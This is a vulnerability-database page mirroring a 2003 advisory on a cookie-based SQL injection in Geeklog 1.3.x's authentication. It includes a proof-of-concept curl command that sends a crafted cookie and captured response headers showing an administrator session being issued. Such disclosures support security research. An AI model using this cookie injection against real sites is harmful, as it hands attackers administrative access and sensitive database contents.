Geeklog 1.3.x – Authenticated SQL Injection

Geeklog 1.3.x – Authenticated SQL Injection

漏洞ID 1053906 漏洞类型
发布时间 2003-05-29 更新时间 2003-05-29
图片[1]-Geeklog 1.3.x – Authenticated SQL Injection-安全小百科CVE编号 N/A
图片[2]-Geeklog 1.3.x – Authenticated SQL Injection-安全小百科CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/22675
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/7742/info

Geeklog is reported to be prone to SQL injection attacks during authentication. This is due to insufficient sanitization of cookie values, which could permit an attacker to inject SQL code. This issue could be exploited to compromise Geeklog or to potentially launch attacks against the database, allowing for disclosure of sensitive information or other consequences. 

curl -b geeklog=2.1 -D header.txt http://www.example.com/users.php

header.txt contains valid session information for the administrative user:

----------------header.txt -------------------------

HTTP/1.1 200 OK
Date: Sat, 17 May 2003 16:15:23 GMT
Server: Apache
Set-Cookie: gl_session=1828197392; path=/
Set-Cookie: LastVisit=1053188123; expires=Sun, 16-May-2004 16:15:23 GMT;
path=/
Set-Cookie: LastVisitTemp=deleted; expires=Fri, 17-May-2002 16:15:22
GMT; path=/; domain=http://www.example.com
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

10
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa


----------------header.txt --------------------------

相关推荐: monopd Remote Buffer Overflow Vulnerability

monopd Remote Buffer Overflow Vulnerability 漏洞ID 1101089 漏洞类型 Boundary Condition Error 发布时间 2002-12-27 更新时间 2002-12-27 CVE编号 N/A C…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享